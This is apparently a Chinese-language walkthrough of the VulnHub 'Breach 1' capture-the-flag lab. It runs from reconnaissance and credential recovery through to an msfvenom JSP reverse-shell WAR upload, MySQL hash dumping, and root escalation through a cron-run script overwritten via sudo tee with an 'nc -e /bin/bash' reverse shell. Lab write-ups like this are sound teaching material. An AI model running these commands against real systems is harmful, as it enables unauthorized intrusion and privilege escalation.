vulnhub breach 1通关

目录

知识点总结：

环境搭建：

靶机通关：

1.信息收集(记住要把靶机先打开)

查找ip

查看端口

目录扫描

漏洞查找

base64解码

IDS/IPS简述

.keystore文件

pcap文件

wireshark流量插入及其自动解密

bp代理

上传木马

提权

linux内核提权

水平越权

mysql越权

图片隐写

tee指令和定时任务提权

 获取flag

提权成功原因说明

知识点总结：

1.要看网页源代码以及附有提示的图片内部内容

2.IPS/IDS的基本概念

3.SSL公私钥相关文件

4.wireshark的流量插入以及自动解密机制

5.bp代理绕过网站拦截证书机制

6.linux内核提权

7.tee指令+定时任务提权

8.mysql越权

9.图片隐写

10.msf相关的木马文件生成

11.远程连接创建shell指令

环境搭建：

攻击机：kali2023

靶机：breach 1

下载地址：https://download.vulnhub.com/breach/Breach-1.0.zip

虚拟机设置：因为该靶机的静态ip是192.168.110.140，我们尽量让kali和靶机在同一子网下，方便连接，并且避免不必要的其他连接。先把攻击机和靶机的网络适配器

然后点击虚拟机的编辑打开虚拟网络编辑器

 更改设置，将子网ip改为

选择V8，修改子网如下

再修改DHCP设置为下

设置完成

靶机通关：

1.信息收集(记住要把靶机先打开)

查找ip

arp-scan -l

查看端口

nmap 192.168.110.140

 发现好多都开着，可能开着端口防护（类似防火墙），优先看看80端口

上面是讲该靶机来历:简述就是 小胖被开了，留了个惊喜给公司！

目录扫描

访问/images目录

遍历所有图片，发现bill.png有提示：让我们看源码

一无所获

回到小胖那看源码

大师我悟了，看到一串编码。

漏洞查找

base64解码

发现刚好64个字符，base64解码看看

再解一次

不知道是什么先留着

突然发现好像小胖的图片好像可以点击，进行重定向，如下

第一步看看源码

让我读邮件。但是好像没邮件可读

点击上述的所有，最后点进Employee portal

要登录，试试之前的解码内容

成功登录，进入后台。

发现邮箱inbox，看一看

仅说了个密码很安全

小胖从供应商那得到廉价的IDS/IPS，那该网站就跟IDS/IPS有关

IDS/IPS简述

IDS：是一个用于检测网络流量的东西，相当于监控，可以监测网络，系统的不安全的行为

IPS：相当于防毒软件和防火墙的补充，不仅可以用来检测网络流量，而且可以当遇到攻击时，根据威胁程度来进行抵御攻击，比如向管理中心告警；丢弃该报文；切断此次应用会话；切断此次TCP连接。

下一封

.keystore文件

发现不明的网站目录文件，192.168.110.140/.keystore，访问试试

自动下载了文件，搜一下.keystore

keystore可以认为是存放秘钥的一个包，需要提供正确的密码才能将包里的秘钥取出来。 

SSL证书也可以被存放在keystore中，需要找到密码才能得到SSL证书。

我们只能找找网站有没有ssl的密码了，发现home目录下的ssl相关信息

直接点击

又一个新数据包，并且告知了一个password是tomcat，namp的指令没有用

pcap文件

 搜索一下pcap文件

得知：PCAP 文件是在计算机网络（例如 WiFi 或以太网）上捕获的数据包的容器，并且使用wireshark打开

此时我们就先导出证书，密码全是tomcat

keytool -importkeystore -srckeystore <keystore的文件名> -destkeystore 文件名.p12 -deststoretype pkcs12 -srcalias tomcat
 
-importkeystore 导出keystore
 
-srckeystore  源keystore文件
 
-destkeystore  导出之后的证书存放路径
 
-deststoretype  导出keystore之后的证书类型
 
-srcalias 源alias

 成功导出

然后我们来看看pcap文件

wireshark流量插入及其自动解密

之前我们得到的.p12文件里面含有密钥，此时我们可以使用的wireshark来进行自动解密

所以我们要把该密钥文件放入流量中

编辑——>首选项——>protocols——>找到SSL(老版本)/TLS(新版本)

点击Edit

 写入如下流量包

 

然后一直确定到最初页面，再根据time进行排序即可找到该流量包

看到一个unauthorized未授权和一个200，果断选择查看200的那个流量包，然后找到了数据

 tomcat:Tt\5D8F(#!*u=G)4m7zB，和一个网站目录192.168.110.140:8443/_M@nag3Me/html

我们直接访问

bp代理

被浏览器的安全机制拦截了证书

此时我们就可以使用bp代理来绕过该机制

try again，拦截导数据包，再发包就成功进入了

好啊好啊，向下找到了上传war文件

上传木马

试过一句话木马，不过立马就噶掉了，可能是由于太简单而被IPS/IDS杀死了，于是我们直接msf生成反弹shell，我们通过信息收集发现该管理系统impress由java写成

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > breach.war
//生成java jsp木马

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.110.129
set lport 4444
run

 已经在监听了，此时我们只需要上传我们的木马文件 breach.war即可(全程都需要burp抓包和放包)

上传后出现下目录

点击访问，bp抓包放包

提权

返回命令行，发现成功连接

使用python命令优化一下该命令行

python -c 'import pty;pty.spawn("/bin/bash")'

查看当前用户的执行权限

sudo -l

要密码

linux内核提权

linux内核提权看看

对照kernel的版本以及Ubuntu版本，发现并没有exp可以使用

水平越权

 那就试试水平越权，查看相关用户权限

cat /etc/passwd

发现有两个用户有执行权限

看能不能试着找找密码

看看80端口网站的服务器是什么

whatweb http://192.168.110.140/impresscms/

是原来Apache，然后搜索一下得知，Apache的站点目录为/var/www/html，然后就一层一层找下去

看到个backup和5446目录，找找看

 唉，这个不行

访问两个php文件，发现两个文件的内容以及提供的提示几乎一样，此处就只cat 一个文件就可以了

mysql越权

就是发现数据库并没有密码（要输入密码时直接回车就好了），那就直接登录

 show database;

use mysql;

 show tables;

红线部分，粗心了，差一个分号，select user,password from user;

拿到密码，但是由于一把数据库的密码都是用md5来加密的，所以我们需要md5解密密文

此处就使用随便搜一个md5解密的网站就行了

MD5免费在线解密破解_MD5在线加密-SOMD5

password：thelaststraw

ctrl+c   N 退出mysql

切换用户

su milton

再查看权限

我的天还不能！

现在我们看一看之前的另一个有执行权限的用户:blumbergh

又要密码。太难了，看文章发现，重新定向，发现线索

图片隐写

返回我们之前的网站的/images目录下有个bill.png，让我看源码，不仅是网页源码，还有该图片的内部的内容，保存下来

 strings命令显示图片的源码内容

strings bill.png

好多行，唯一像密码的就只有coffeestains，于是尝试登录，并查看可执行的文件

tee指令和定时任务提权

tee命令一般配合 | 利用

ls | tee 1.txt

| 前面进行执行命令ls，执行命令的结果会保存在1.txt文件中

然后问了一下GPT,关于/usr/share/cleanup/tidyup.sh这个文件

/usr/share/cleanup/tidyup.sh这个路径看起来是一个自定义的脚本文件位置，用于系统清理或维护。在标准Linux发行版中，并没有预设的这样一个脚本。不过，有些系统管理员可能会在/usr/share目录下创建一个cleanup子目录，并在其中放置一个名为tidyup.sh的脚本，用以执行一些系统清理任务，比如清理临时文件、日志归档、释放磁盘空间等。

经过实操，发现tidyup.sh，我们只有写入权限，而没有执行权限，但是该定时任务每三分钟会执行一次，所以我们只需要把内容写进去就行了

我们就使用tee指令+定时任务开提权试试

 在命令执行之前，我们先另起一个终端，监听一下端口

nc -lvp 5555

 开始提权

echo "nc -e /bin/bash 192.168.110.129 5555" > shell.txt
#写入命令到shell.txt，在kali创建一个shell命令行
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
#写入命令到tidyup.sh
cat /usr/share/cleanup/tidyup.sh
#查看成功写入

 静候连接，连接成功，为root权限

 获取flag

cp /root/flair.jpg /var/www/html/images   #复制flair.ipg到/images目录下

然后回到/images目录下查看flair.jpg即可

 成功！！！

提权成功原因说明

介绍上述为什么会提权成功，首先我们使用的nc那个远程连接执行，我们以什么身份执行该命令，所远程连接的权限就会跟执行命令的身份的权限一致，虽然我不是root权限，但是我所在用户可以使用以root权限执行tee指令和写入文件内容，实现与kali攻击机进行连接，由于定时任务的原因，系统会自动以root权限执行tidyup.sh，所以此时相当于root用户在执行该命令，远程连接的shell自然也是root权限了！！！